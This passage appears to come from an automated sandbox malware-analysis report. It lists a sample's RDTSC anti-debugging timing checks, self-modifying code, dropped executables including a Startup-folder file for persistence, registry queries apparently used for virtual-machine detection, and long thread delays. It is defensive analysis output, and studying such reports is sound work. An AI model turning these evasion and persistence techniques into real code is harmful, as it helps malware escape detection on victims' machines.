                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A90 second address: 4FC0A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A94 second address: 4FC0A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A9A second address: 4FC0AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0AB1 second address: 4FC0AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0AB5 second address: 4FC0ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0ABB second address: 4FC0AC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0AC0 second address: 4FC0AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test esi, esi 0x0000000c jmp 00007FC408FC7021h 0x00000011 je 00007FC47AF2C8C7h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edi 0x0000001b pop eax 0x0000001c mov esi, ebx 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0AEB second address: 4FC0B1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC408FC8B17h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0B1F second address: 4FC0B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC7024h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0B37 second address: 4FC0B82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d jmp 00007FC408FC8B16h 0x00000012 je 00007FC47AF2E349h 0x00000018 jmp 00007FC408FC8B10h 0x0000001d test byte ptr [76FB6968h], 00000002h 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0B82 second address: 4FC0B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0CF5 second address: 4FC0D04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0DBF second address: 4FD0E0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC408FC701Fh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FC408FC7029h 0x0000000f xor cl, 00000066h 0x00000012 jmp 00007FC408FC7021h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f movsx ebx, cx 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0B04 second address: 4FD0B90 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC408FC8B12h 0x00000008 jmp 00007FC408FC8B15h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushfd 0x00000011 jmp 00007FC408FC8B10h 0x00000016 and ecx, 3BAF9718h 0x0000001c jmp 00007FC408FC8B0Bh 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FC408FC8B0Fh 0x0000002b adc cl, FFFFFFDEh 0x0000002e jmp 00007FC408FC8B19h 0x00000033 popfd 0x00000034 mov ax, 96A7h 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0B90 second address: 4FD0B9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50505C9 second address: 50505CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50505CD second address: 50505D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50505D3 second address: 5050678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, EA67h 0x00000007 pushfd 0x00000008 jmp 00007FC408FC8B0Ch 0x0000000d sub eax, 2AA1E898h 0x00000013 jmp 00007FC408FC8B0Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FC408FC8B16h 0x00000022 push eax 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FC408FC8B11h 0x0000002a sbb al, FFFFFFE6h 0x0000002d jmp 00007FC408FC8B11h 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007FC408FC8B10h 0x00000039 xor esi, 57335C88h 0x0000003f jmp 00007FC408FC8B0Bh 0x00000044 popfd 0x00000045 popad 0x00000046 xchg eax, ebp 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FC408FC8B15h 0x0000004e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050678 second address: 50506AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC408FC7027h 0x00000008 pop esi 0x00000009 mov edi, 08075B5Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC408FC701Eh 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D97 second address: 5040DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC8B14h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040BD6 second address: 5040BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040BDC second address: 5040BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040BE0 second address: 5040C64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FC408FC701Eh 0x00000011 push eax 0x00000012 pushad 0x00000013 push edi 0x00000014 mov ax, A633h 0x00000018 pop ecx 0x00000019 mov dx, 891Ch 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f jmp 00007FC408FC701Bh 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov ecx, ebx 0x0000002b pushfd 0x0000002c jmp 00007FC408FC7027h 0x00000031 and cl, FFFFFFFEh 0x00000034 jmp 00007FC408FC7029h 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0148 second address: 4FE0188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d mov ah, A0h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FC408FC8B14h 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov edi, 49515370h 0x0000001f mov bx, 369Ch 0x00000023 popad 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0188 second address: 4FE0190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050034 second address: 5050040 instructions: 0x00000000 rdtsc 0x00000002 mov di, 73B0h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop ecx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050040 second address: 50500AF instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a jmp 00007FC408FC701Dh 0x0000000f push dword ptr [ebp+0Ch] 0x00000012 jmp 00007FC408FC701Eh 0x00000017 push dword ptr [ebp+08h] 0x0000001a pushad 0x0000001b jmp 00007FC408FC701Eh 0x00000020 popad 0x00000021 push DB5A13EBh 0x00000026 jmp 00007FC408FC701Dh 0x0000002b add dword ptr [esp], 24A6EC17h 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 movsx edx, cx 0x00000038 jmp 00007FC408FC7024h 0x0000003d popad 0x0000003e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF060F second address: 4FF06B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov ah, 28h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov esi, edi 0x0000000f mov ah, dl 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 jmp 00007FC408FC8B14h 0x00000019 push FFFFFFFEh 0x0000001b pushad 0x0000001c mov dl, ah 0x0000001e mov cx, dx 0x00000021 popad 0x00000022 push 1BD060C4h 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FC408FC8B10h 0x0000002e xor ecx, 148E99F8h 0x00000034 jmp 00007FC408FC8B0Bh 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007FC408FC8B18h 0x00000040 xor cx, 7458h 0x00000045 jmp 00007FC408FC8B0Bh 0x0000004a popfd 0x0000004b popad 0x0000004c xor dword ptr [esp], 6D29A0DCh 0x00000053 pushad 0x00000054 pushad 0x00000055 mov ch, 41h 0x00000057 mov di, 63D2h 0x0000005b popad 0x0000005c movsx edi, cx 0x0000005f popad 0x00000060 push 6AA2C215h 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF06B2 second address: 4FF06BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 64C9h 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF06BB second address: 4FF073B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 1C526C15h 0x00000010 jmp 00007FC408FC8B16h 0x00000015 mov eax, dword ptr fs:[00000000h] 0x0000001b pushad 0x0000001c mov edx, esi 0x0000001e pushfd 0x0000001f jmp 00007FC408FC8B0Ah 0x00000024 or cx, 2378h 0x00000029 jmp 00007FC408FC8B0Bh 0x0000002e popfd 0x0000002f popad 0x00000030 nop 0x00000031 jmp 00007FC408FC8B16h 0x00000036 push eax 0x00000037 jmp 00007FC408FC8B0Bh 0x0000003c nop 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF073B second address: 4FF0756 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0756 second address: 4FF075C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF075C second address: 4FF0760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0760 second address: 4FF0764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0764 second address: 4FF0775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 1Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0775 second address: 4FF0779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0779 second address: 4FF077D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF077D second address: 4FF0783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0783 second address: 4FF087A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FC408FC7026h 0x0000000f push eax 0x00000010 pushad 0x00000011 push edx 0x00000012 movzx ecx, dx 0x00000015 pop edi 0x00000016 jmp 00007FC408FC7026h 0x0000001b popad 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e mov ebx, esi 0x00000020 pushfd 0x00000021 jmp 00007FC408FC701Ah 0x00000026 sbb ax, F688h 0x0000002b jmp 00007FC408FC701Bh 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FC408FC7022h 0x0000003b add ax, 58E8h 0x00000040 jmp 00007FC408FC701Bh 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007FC408FC7028h 0x0000004c sbb cx, 6B48h 0x00000051 jmp 00007FC408FC701Bh 0x00000056 popfd 0x00000057 popad 0x00000058 pushfd 0x00000059 jmp 00007FC408FC7028h 0x0000005e adc ch, FFFFFFA8h 0x00000061 jmp 00007FC408FC701Bh 0x00000066 popfd 0x00000067 popad 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FC408FC7024h 0x00000070 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF087A second address: 4FF08D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, B4h 0x00000005 mov ecx, 4BC645D9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC408FC8B12h 0x00000015 jmp 00007FC408FC8B15h 0x0000001a popfd 0x0000001b mov cx, 8C57h 0x0000001f popad 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC408FC8B19h 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF08D3 second address: 4FF0931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC408FC7021h 0x0000000f xchg eax, edi 0x00000010 jmp 00007FC408FC701Eh 0x00000015 mov eax, dword ptr [76FBB370h] 0x0000001a jmp 00007FC408FC7020h 0x0000001f xor dword ptr [ebp-08h], eax 0x00000022 pushad 0x00000023 mov cl, 16h 0x00000025 mov bx, ADCEh 0x00000029 popad 0x0000002a xor eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0931 second address: 4FF0937 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0937 second address: 4FF09B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC408FC7024h 0x00000009 add si, BE48h 0x0000000e jmp 00007FC408FC701Bh 0x00000013 popfd 0x00000014 mov esi, 1081D1BFh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d jmp 00007FC408FC7022h 0x00000022 push eax 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FC408FC7021h 0x0000002a or cx, 7A16h 0x0000002f jmp 00007FC408FC7021h 0x00000034 popfd 0x00000035 mov ah, DCh 0x00000037 popad 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF09B0 second address: 4FF09C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF09C4 second address: 4FF09CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF09CA second address: 4FF09CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF09CE second address: 4FF09FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dx, 00AEh 0x00000015 jmp 00007FC408FC701Fh 0x0000001a popad 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF09FB second address: 4FF0A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0A01 second address: 4FF0A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0A05 second address: 4FF0A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Tries to evade debugger and weak emulator (self modifying code)
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EBEDFA instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EBC16A instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10E3D69 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 46EDFA instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 46C16A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 693D69 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSpecial instruction interceptor: First address: CCAB3E instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSpecial instruction interceptor: First address: CC81E6 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSpecial instruction interceptor: First address: E7C5E3 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSpecial instruction interceptor: First address: EFE96C instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSpecial instruction interceptor: First address: 5D5308F instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSpecial instruction interceptor: First address: 5BAB272 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSpecial instruction interceptor: First address: 5D7DA8F instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSpecial instruction interceptor: First address: 5DEC419 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeMemory allocated: 9B0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeMemory allocated: 23D0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeMemory allocated: 2200000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeMemory allocated: AD0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeMemory allocated: 1B100000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeMemory allocated: EC0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeMemory allocated: 1AAA0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeMemory allocated: BF0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeMemory allocated: 1AF30000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeMemory allocated: 1530000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeMemory allocated: 1B050000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeMemory allocated: 1190000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeMemory allocated: 1AB70000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeMemory allocated: 2870000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeMemory allocated: 1AB50000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05050000 rdtsc 0_2_05050000
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599890Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599781Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599672Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599562Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599453Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599343Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599234Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599125Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598992Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598797Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598625Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598515Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598406Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598290Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598161Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598011Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597906Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597791Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597673Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597531Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597422Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597310Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597196Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597078Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 596967Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 596858Jump to behavior
